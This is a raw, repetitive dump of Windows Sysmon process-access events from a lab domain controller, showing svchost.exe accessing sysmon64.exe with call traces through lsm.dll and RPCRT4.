10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.354{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001455Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001454Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001453Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001452Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001451Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001450Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001449Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001448Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:10.338{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001447Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 